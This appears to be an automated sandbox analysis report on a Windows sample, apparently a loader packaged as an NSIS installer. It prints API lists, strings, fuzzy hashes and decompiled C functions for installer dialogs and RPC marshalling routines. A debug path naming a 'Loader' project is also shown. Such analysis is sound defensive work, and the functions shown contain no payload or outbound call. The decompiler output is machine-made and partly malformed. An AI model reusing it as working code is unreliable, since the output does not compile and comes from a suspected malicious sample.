                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3294113728-0
                                                                                                • Opcode ID: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                                                                                                • Instruction ID: 8136da2242d6e6cba5f284f27b64b1989b358de0d737458f3662c87ad7b72ced
                                                                                                • Opcode Fuzzy Hash: 1fe56166fb6cd4dbd5b8f8a47f0c0769986a224b60575e965902ed59b0249d4b
                                                                                                • Instruction Fuzzy Hash: 4A318B71C00128BBDF216FA9CD49DAE7E79EF05324F10822AF520762E0C7795D419BA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6A3D
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6A7D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid array format type %x$invalid format type %x$memory_size = %d
                                                                                                • API String ID: 3997070919-2774118540
                                                                                                • Opcode ID: a9154dd20884a6f3dcac8aa34caa55a3db256c65f1fad07485fb021aac9ea188
                                                                                                • Instruction ID: c82bc5021b34ac91f2c91bfe38f889a9e7b1b06411b048f27f85e5b7d38b4f9d
                                                                                                • Opcode Fuzzy Hash: a9154dd20884a6f3dcac8aa34caa55a3db256c65f1fad07485fb021aac9ea188
                                                                                                • Instruction Fuzzy Hash: AA3180B5A00144EBCB04CF98D890DBEBBB6AF49245F14C198FA559B341E730DF51CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00404CC9(CHAR* _a4, CHAR* _a8) {
                                                                                                				struct HWND__* _v8;
                                                                                                				signed int _v12;
                                                                                                				CHAR* _v32;
                                                                                                				long _v44;
                                                                                                				int _v48;
                                                                                                				void* _v52;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				CHAR* _t26;
                                                                                                				signed int _t27;
                                                                                                				CHAR* _t28;
                                                                                                				long _t29;
                                                                                                				signed int _t39;
                                                                                                
                                                                                                				_t26 =  *0x42e344; // 0x0
                                                                                                				_v8 = _t26;
                                                                                                				if(_t26 != 0) {
                                                                                                					_t27 =  *0x42ec14; // 0x0
                                                                                                					_v12 = _t27;
                                                                                                					_t39 = _t27 & 0x00000001;
                                                                                                					if(_t39 == 0) {
                                                                                                						E0040594D(0, _t39, 0x4297b0, 0x4297b0, _a4);
                                                                                                					}
                                                                                                					_t26 = lstrlenA(0x4297b0);
                                                                                                					_a4 = _t26;
                                                                                                					if(_a8 == 0) {
                                                                                                						L6:
                                                                                                						if((_v12 & 0x00000004) == 0) {
                                                                                                							_t26 = SetWindowTextA( *0x42e328, 0x4297b0);
                                                                                                						}
                                                                                                						if((_v12 & 0x00000002) == 0) {
                                                                                                							_v32 = 0x4297b0;
                                                                                                							_v52 = 1;
                                                                                                							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                                                							_v44 = 0;
                                                                                                							_v48 = _t29 - _t39;
                                                                                                							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                                                							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                                                						}
                                                                                                						if(_t39 != 0) {
                                                                                                							_t28 = _a4;
                                                                                                							 *((char*)(_t28 + 0x4297b0)) = 0;
                                                                                                							return _t28;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                                                						if(_t26 < 0x800) {
                                                                                                							_t26 = lstrcatA(0x4297b0, _a8);
                                                                                                							goto L6;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				return _t26;
                                                                                                			}


















                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(004297B0,00000000,0041B732,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                                                                                • lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041B732,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                                                                                • lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041B732,73BCEA30), ref: 00404D25
                                                                                                • SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                                                                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                                                                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 2531174081-0
                                                                                                • Opcode ID: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                                                                                                • Instruction ID: 8ccdf1774425cd87f0729cbca42791fc67af6cd1557da5970d5077929bdf2610
                                                                                                • Opcode Fuzzy Hash: 259a6bfffd9455f75c7f37c98e6fd5d39197061d1bb8cf0c94f6c9d48c0e4d13
                                                                                                • Instruction Fuzzy Hash: 17215EB1900158BBDF119FA5CD80A9EBFB9EF44364F14807AF944A6291C7394E41DF98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7,?,?,?,00000002), ref: 6EDAB10A
                                                                                                • RpcRaiseException.RPCRT4(000006C6,?,?,?,?,?,00000002), ref: 6EDAB133
                                                                                                • RpcRaiseException.RPCRT4(000006C6,?,?,?,?,?,?,00000002), ref: 6EDAB18A
                                                                                                Strings
                                                                                                • invalid string length of %d, xrefs: 6EDAB121
                                                                                                • string not null-terminated at byte position %d, data is 0x%x, xrefs: 6EDAB178
                                                                                                • bufsize 0x%x exceeded buffer end %p of buffer %p, xrefs: 6EDAB0F8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: bufsize 0x%x exceeded buffer end %p of buffer %p$invalid string length of %d$string not null-terminated at byte position %d, data is 0x%x
                                                                                                • API String ID: 3997070919-2613499994
                                                                                                • Opcode ID: 90ee01f159f8c7e9a87168cfcaaddae769ac1158d0dd8a7c1d6280c2c1c90a54
                                                                                                • Instruction ID: e0e879815ff5b2d88601ab47c31eb9840ebf2cebffd9d464bdc51a9cb829431f
                                                                                                • Opcode Fuzzy Hash: 90ee01f159f8c7e9a87168cfcaaddae769ac1158d0dd8a7c1d6280c2c1c90a54
                                                                                                • Instruction Fuzzy Hash: 1D21F4B4600108EFDB04CF98C994DAABBB6AF89350B14C188F9594B385D731EE51CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 16%
                                                                                                			E6EDA8700(void* __ecx, intOrPtr _a4, intOrPtr* _a8, signed char* _a12) {
                                                                                                				intOrPtr _v8;
                                                                                                				signed char* _t57;
                                                                                                				void* _t60;
                                                                                                				void* _t61;
                                                                                                
                                                                                                				0x6eda0000("pStubMsg %p, pMemory %p, type 0x%02x\n", _a4, _a8,  *_a12 & 0x000000ff, __ecx);
                                                                                                				_t61 = _t60 + 0x10;
                                                                                                				if(( *_a12 & 0x000000ff) != 0x30) {
                                                                                                					0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                                					_t61 = _t61 + 8;
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                				}
                                                                                                				0x6eda0000("flags: 0x%02x\n", _a12[1] & 0x000000ff);
                                                                                                				if(( *(_a4 + 0x20) & 0x000000ff) == 0) {
                                                                                                					__eflags = 1;
                                                                                                					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x60)) + 0x10)) + ( *(_a12 + (1 << 1)) & 0x000000ff) * 4));
                                                                                                				} else {
                                                                                                					_t57 = _a12;
                                                                                                					_t65 = _t57[1] & 0x80;
                                                                                                					if((_t57[1] & 0x80) == 0) {
                                                                                                						E6EDA2310(__eflags, _a4, _a8, 0);
                                                                                                					} else {
                                                                                                						E6EDA2310(_t65, _a4,  *_a8, 0);
                                                                                                					}
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}








                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA8744
                                                                                                • _NdrClientContextMarshall@12.SOZZ(?,?,00000000), ref: 6EDA8794
                                                                                                • _NdrClientContextMarshall@12.SOZZ(?,?,00000000), ref: 6EDA87A5
                                                                                                  • Part of subcall function 6EDA2310: RpcRaiseException.RPCRT4(000006F7), ref: 6EDA2380
                                                                                                  • Part of subcall function 6EDA2310: NDRCContextMarshall.RPCRT4(?,?), ref: 6EDA2391
                                                                                                Strings
                                                                                                • invalid format type %x, xrefs: 6EDA8732
                                                                                                • flags: 0x%02x, xrefs: 6EDA875A
                                                                                                • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6EDA8713
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Context$ClientExceptionMarshall@12Raise$Marshall
                                                                                                • String ID: flags: 0x%02x$invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                                • API String ID: 1309183824-1391298755
                                                                                                • Opcode ID: 22964cc801c03ed750a5145dfd2f57dde8094cc846dc39fbd6f8979b71750162
                                                                                                • Instruction ID: 950e20e37f5f3fefb779bb9858691aa9f040bed0cae301a99980cef6796a50be
                                                                                                • Opcode Fuzzy Hash: 22964cc801c03ed750a5145dfd2f57dde8094cc846dc39fbd6f8979b71750162
                                                                                                • Instruction Fuzzy Hash: 7D21B6B9604285ABD744CF99C8A1FAA77A9BB86340F008558FD658B381D631EA10CBB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00404598(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                				long _v8;
                                                                                                				signed char _v12;
                                                                                                				unsigned int _v16;
                                                                                                				void* _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				long _v56;
                                                                                                				void* _v60;
                                                                                                				long _t15;
                                                                                                				unsigned int _t19;
                                                                                                				signed int _t25;
                                                                                                				struct HWND__* _t28;
                                                                                                
                                                                                                				_t28 = _a4;
                                                                                                				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                                                                				if(_a8 == 0) {
                                                                                                					L4:
                                                                                                					_v56 = _t15;
                                                                                                					_v60 = 4;
                                                                                                					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                                                                					return _v24;
                                                                                                				}
                                                                                                				_t19 = GetMessagePos();
                                                                                                				_v16 = _t19 >> 0x10;
                                                                                                				_v20 = _t19;
                                                                                                				ScreenToClient(_t28,  &_v20);
                                                                                                				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                                                                				if((_v12 & 0x00000066) != 0) {
                                                                                                					_t15 = _v8;
                                                                                                					goto L4;
                                                                                                				}
                                                                                                				return _t25 | 0xffffffff;
                                                                                                			}















                                                                                                APIs
                                                                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004045B3
                                                                                                • GetMessagePos.USER32 ref: 004045BB
                                                                                                • ScreenToClient.USER32 ref: 004045D5
                                                                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 004045E7
                                                                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040460D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                • String ID: f
                                                                                                • API String ID: 41195575-1993550816
                                                                                                • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                • Instruction ID: 6b317f608504f5286e083177801d0cb87e447db18072776417f46e2e8b339eff
                                                                                                • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                • Instruction Fuzzy Hash: 5C014C71D00219BADB00DBA4DC85BEEBBB8AF59711F10016ABB00B61D0D7B8A9458BA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                				char _v68;
                                                                                                				int _t11;
                                                                                                				int _t20;
                                                                                                
                                                                                                				if(_a8 == 0x110) {
                                                                                                					SetTimer(_a4, 1, 0xfa, 0);
                                                                                                					_a8 = 0x113;
                                                                                                				}
                                                                                                				if(_a8 == 0x113) {
                                                                                                					_t20 =  *0x414b78; // 0xcb782
                                                                                                					_t11 =  *0x428b88; // 0xcb786
                                                                                                					if(_t20 >= _t11) {
                                                                                                						_t20 = _t11;
                                                                                                					}
                                                                                                					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                                					SetWindowTextA(_a4,  &_v68);
                                                                                                					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}







                                                                                                APIs
                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                                                                                                • MulDiv.KERNEL32(000CB782,00000064,000CB786), ref: 00402B73
                                                                                                • wsprintfA.USER32 ref: 00402B83
                                                                                                • SetWindowTextA.USER32(?,?), ref: 00402B93
                                                                                                • SetDlgItemTextA.USER32 ref: 00402BA5
                                                                                                Strings
                                                                                                • verifying installer: %d%%, xrefs: 00402B7D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                • String ID: verifying installer: %d%%
                                                                                                • API String ID: 1451636040-82062127
                                                                                                • Opcode ID: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                                                                                                • Instruction ID: d97cc89adede162bb954025147407c84299f45570db21cfab8362f7584a841fe
                                                                                                • Opcode Fuzzy Hash: 821183565d5cfc23d2a1d69bdf9aca7d49efffeabee144d451769c9d9fec15d5
                                                                                                • Instruction Fuzzy Hash: 25014470A00209BBEB219F60DD09FAE3779AB04305F008039FA06A92D0D7B9A9518B59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 49%
                                                                                                			E6EDAD830(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28) {
                                                                                                				signed int _v5;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				signed int _v24;
                                                                                                				signed int _v28;
                                                                                                				signed int _v32;
                                                                                                				signed int _v36;
                                                                                                				signed int _v40;
                                                                                                				signed int _v44;
                                                                                                				signed int _t227;
                                                                                                
                                                                                                				_v28 = _a4 & 0x000000ff;
                                                                                                				_v28 = _v28 - 0x1b;
                                                                                                				if(_v28 > 0xa) {
                                                                                                					L57:
                                                                                                					_t227 = _a4 & 0x000000ff;
                                                                                                					0x6eda0000("unknown array format 0x%x\n", _t227);
                                                                                                					__imp__RpcRaiseException(0x6f7);
                                                                                                					return _t227;
                                                                                                				}
                                                                                                				_t7 = _v28 + 0x6edade1c; // 0xcccccc03
                                                                                                				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M6EDADE08))) {
                                                                                                					case 0:
                                                                                                						_v12 =  *((intOrPtr*)(_a16 + 2));
                                                                                                						_v5 = ( *(_a16 + (1 << 0)) & 0x000000ff) + 1;
                                                                                                						_v24 = E6EDAAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
                                                                                                						_v16 = _v24;
                                                                                                						_a16 = E6EDAA440(_a8, _a16 + 4);
                                                                                                						E6EDA73D0(_a8 + 4, _a8 + 4, _v5 & 0x000000ff);
                                                                                                						_t297 = _t293 + 0x18;
                                                                                                						if((_a28 & 0x000000ff) == 0) {
                                                                                                							L11:
                                                                                                							return _v16;
                                                                                                						} else {
                                                                                                							if((_a20 & 0x000000ff) == 0) {
                                                                                                								__eflags = _a24 & 0x000000ff;
                                                                                                								if((_a24 & 0x000000ff) != 0) {
                                                                                                									_t249 = _a8;
                                                                                                									__eflags =  *(_t249 + 0x20) & 0x000000ff;
                                                                                                									if(( *(_t249 + 0x20) & 0x000000ff) == 0) {
                                                                                                										__eflags =  *_a12;
                                                                                                										if( *_a12 == 0) {
                                                                                                											 *_a12 =  *(_a8 + 4);
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							} else {
                                                                                                								_t251 = E6EDAA3B0(_v24, _a8, _v24);
                                                                                                								_t297 = _t297 + 8;
                                                                                                								 *_a12 = _t251;
                                                                                                							}
                                                                                                							_v20 =  *(_a8 + 4);
                                                                                                							E6EDAAF00(_a8, _v16);
                                                                                                							 *((intOrPtr*)(_a8 + 0x10)) = _v20;
                                                                                                							E6EDAC2B0(_a8, _v20,  *_a12, _a16, _a20 & 0x000000ff);
                                                                                                							_push( *_a12);
                                                                                                							_push(_v20);
                                                                                                							_push("copying %p to %p\n");
                                                                                                							0x6eda0000();
                                                                                                							if( *_a12 != _v20) {
                                                                                                								E6EDB0120( *_a12, _v20, _v16);
                                                                                                							}
                                                                                                							goto L11;
                                                                                                						}
                                                                                                					case 1:
                                                                                                						__eax = _a16;
                                                                                                						__cx =  *((intOrPtr*)(__eax + 2));
                                                                                                						_v12 =  *((intOrPtr*)(__eax + 2));
                                                                                                						1 = 1 << 0;
                                                                                                						__eax = _a16;
                                                                                                						 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) + 1;
                                                                                                						_v5 = __cl;
                                                                                                						_a16 = _a16 + 4;
                                                                                                						__eax = _a8;
                                                                                                						_a16 = E6EDAA440(_a8, _a16 + 4);
                                                                                                						__ecx = _a8;
                                                                                                						__edx =  *(_a8 + 0x3c);
                                                                                                						__eax = _a16;
                                                                                                						__ecx = _a8;
                                                                                                						_a16 = E6EDAA540(__ecx, __ecx, _a16,  *(_a8 + 0x3c));
                                                                                                						__edx = _v5 & 0x000000ff;
                                                                                                						_a8 = _a8 + 4;
                                                                                                						__eax = E6EDA73D0(__ecx, _a8 + 4, _v5 & 0x000000ff);
                                                                                                						__ecx = _a8;
                                                                                                						__edx =  *(_a8 + 0x44);
                                                                                                						__eax = _v12 & 0x0000ffff;
                                                                                                						_v16 = E6EDAAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x44));
                                                                                                						__ecx = _a8;
                                                                                                						__edx =  *(_a8 + 0x3c);
                                                                                                						__eax = _v12 & 0x0000ffff;
                                                                                                						_v24 = E6EDAAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
                                                                                                						__ecx = _a28 & 0x000000ff;
                                                                                                						__eflags = _a28 & 0x000000ff;
                                                                                                						if((_a28 & 0x000000ff) != 0) {
                                                                                                							__edx = _a8;
                                                                                                							__eax =  *(__edx + 0x40);
                                                                                                							_v40 =  *(__edx + 0x40);
                                                                                                							__ecx = _a20 & 0x000000ff;
                                                                                                							__eflags = _a20 & 0x000000ff;
                                                                                                							if((_a20 & 0x000000ff) == 0) {
                                                                                                								__edx = _a12;
                                                                                                								__eflags =  *_a12;
                                                                                                								if( *_a12 == 0) {
                                                                                                									_a20 = 1;
                                                                                                								}
                                                                                                							}
                                                                                                							__eax = _a20 & 0x000000ff;
                                                                                                							__eflags = _a20 & 0x000000ff;
                                                                                                							if((_a20 & 0x000000ff) != 0) {
                                                                                                								__ecx = _v24;
                                                                                                								__edx = _a8;
                                                                                                								__eax = E6EDAA3B0(_v24, _a8, _v24);
                                                                                                								__ecx = _a12;
                                                                                                								 *_a12 = __eax;
                                                                                                							}
                                                                                                							__edx = _a8;
                                                                                                							__eax =  *(__edx + 4);
                                                                                                							_v20 =  *(__edx + 4);
                                                                                                							__ecx = _v16;
                                                                                                							__edx = _a8;
                                                                                                							E6EDAAF00(_a8, _v16) = _a8;
                                                                                                							__ecx = _v20;
                                                                                                							 *((intOrPtr*)(_a8 + 0x10)) = _v20;
                                                                                                							__edx = _a20 & 0x000000ff;
                                                                                                							__eax = _a16;
                                                                                                							__ecx = _a12;
                                                                                                							__edx =  *_a12;
                                                                                                							__eax = _v20;
                                                                                                							__ecx = _a8;
                                                                                                							__eax = E6EDAC2B0(_a8, _v20,  *_a12, _a16, _a20 & 0x000000ff);
                                                                                                							__edx = _v16;
                                                                                                							__eax = _v20;
                                                                                                							__ecx = _a12;
                                                                                                							 *_a12 =  *_a12 + _v40;
                                                                                                							__eflags =  *_a12 + _v40;
                                                                                                							__eax = E6EDB0120( *_a12 + _v40, _v20, _v16);
                                                                                                						}
                                                                                                						__eax = _v16;
                                                                                                						return _v16;
                                                                                                					case 2:
                                                                                                						1 = 1 << 0;
                                                                                                						__eax = _a16;
                                                                                                						 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) + 1;
                                                                                                						_v5 = __cl;
                                                                                                						_a16 = _a16 + 4;
                                                                                                						__eax = _a8;
                                                                                                						_a16 = E6EDAA440(_a8, _a16 + 4);
                                                                                                						__ecx = _a8;
                                                                                                						__edx =  *(_a8 + 0x3c);
                                                                                                						__eax = _a16;
                                                                                                						__ecx = _a8;
                                                                                                						_a16 = E6EDAA540(_a8, _a8, _a16,  *(_a8 + 0x3c));
                                                                                                						__edx = _a16;
                                                                                                						_push(_a16);
                                                                                                						__eax = _a8;
                                                                                                						_push(_a8);
                                                                                                						0x6eda0000();
                                                                                                						__esp = __esp + 8;
                                                                                                						_v12 = __ax;
                                                                                                						__ecx = _a8;
                                                                                                						__edx =  *(_a8 + 0x3c);
                                                                                                						__eax = _v12 & 0x0000ffff;
                                                                                                						_v24 = E6EDAAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
                                                                                                						__ecx = _a28 & 0x000000ff;
                                                                                                						__eflags = _a28 & 0x000000ff;
                                                                                                						if(__eflags == 0) {
                                                                                                							_push(0xab4);
                                                                                                							__eax = E6EDAFA71(__ebx, __edx, __edi, __esi, __eflags, L"fUnmarshall", L"C:\\xampp\\htdocs\\Loct\\fb11756e47a4488bb45f8c56ea0c6221\\Loader\\Project4\\Project4\\Source.c");
                                                                                                						}
                                                                                                						__eax = _a20 & 0x000000ff;
                                                                                                						__eflags = _a20 & 0x000000ff;
                                                                                                						if((_a20 & 0x000000ff) == 0) {
                                                                                                							__ecx = _a12;
                                                                                                							__eflags =  *_a12;
                                                                                                							if( *_a12 == 0) {
                                                                                                								_a20 = 1;
                                                                                                							}
                                                                                                						}
                                                                                                						__edx = _a20 & 0x000000ff;
                                                                                                						__eflags = _a20 & 0x000000ff;
                                                                                                						if((_a20 & 0x000000ff) != 0) {
                                                                                                							__eax = _v24;
                                                                                                							__ecx = _a8;
                                                                                                							__eax = E6EDAA3B0(_a8, _a8, _v24);
                                                                                                							__edx = _a12;
                                                                                                							 *_a12 = __eax;
                                                                                                						}
                                                                                                						__eax = _v5 & 0x000000ff;
                                                                                                						__ecx = _a8;
                                                                                                						__ecx = _a8 + 4;
                                                                                                						__eax = E6EDA73D0(_a8 + 4, _a8 + 4, _v5 & 0x000000ff);
                                                                                                						__edx = _a8;
                                                                                                						__eax =  *(__edx + 4);
                                                                                                						_v20 =  *(__edx + 4);
                                                                                                						__ecx = _a12;
                                                                                                						__edx =  *_a12;
                                                                                                						_v36 =  *_a12;
                                                                                                						__eax = _a8;
                                                                                                						__ecx =  *(__eax + 0x44);
                                                                                                						_v44 =  *(__eax + 0x44);
                                                                                                						_v32 = 0;
                                                                                                						while(1) {
                                                                                                							__eax = _v32;
                                                                                                							__eflags = _v32 - _v44;
                                                                                                							if(_v32 >= _v44) {
                                                                                                								break;
                                                                                                							}
                                                                                                							__ecx = _a20 & 0x000000ff;
                                                                                                							__edx = _a16;
                                                                                                							__eax = _v36;
                                                                                                							__ecx = _a8;
                                                                                                							_v36 = E6EDA9560(_a8, _v36, _a16, 0, _a20 & 0x000000ff);
                                                                                                							__edx = _v32;
                                                                                                							__edx = _v32 + 1;
                                                                                                							__eflags = __edx;
                                                                                                							_v32 = __edx;
                                                                                                						}
                                                                                                						__edx = _a8;
                                                                                                						 *(__edx + 4) =  *(__edx + 4) - _v20;
                                                                                                						return  *(__edx + 4) - _v20;
                                                                                                					case 3:
                                                                                                						__eax = _a4 & 0x000000ff;
                                                                                                						__eflags = (_a4 & 0x000000ff) - 0x22;
                                                                                                						if((_a4 & 0x000000ff) != 0x22) {
                                                                                                							__edx = 2;
                                                                                                							_v12 = __dx;
                                                                                                						} else {
                                                                                                							__ecx = 1;
                                                                                                							_v12 = __cx;
                                                                                                						}
                                                                                                						__eax = _a8;
                                                                                                						__ecx =  *(_a8 + 0x3c);
                                                                                                						__edx = _a8;
                                                                                                						E6EDAA540( *(_a8 + 0x3c), _a8, 0,  *(_a8 + 0x3c)) = 1;
                                                                                                						__eax = 1 << 0;
                                                                                                						__ecx = _a16;
                                                                                                						__edx =  *(__ecx + (1 << 0)) & 0x000000ff;
                                                                                                						__eflags = ( *(__ecx + (1 << 0)) & 0x000000ff) - 0x44;
                                                                                                						if(( *(__ecx + (1 << 0)) & 0x000000ff) != 0x44) {
                                                                                                							__eax = _a8;
                                                                                                							__ecx = _a8;
                                                                                                							__edx =  *(__eax + 0x3c);
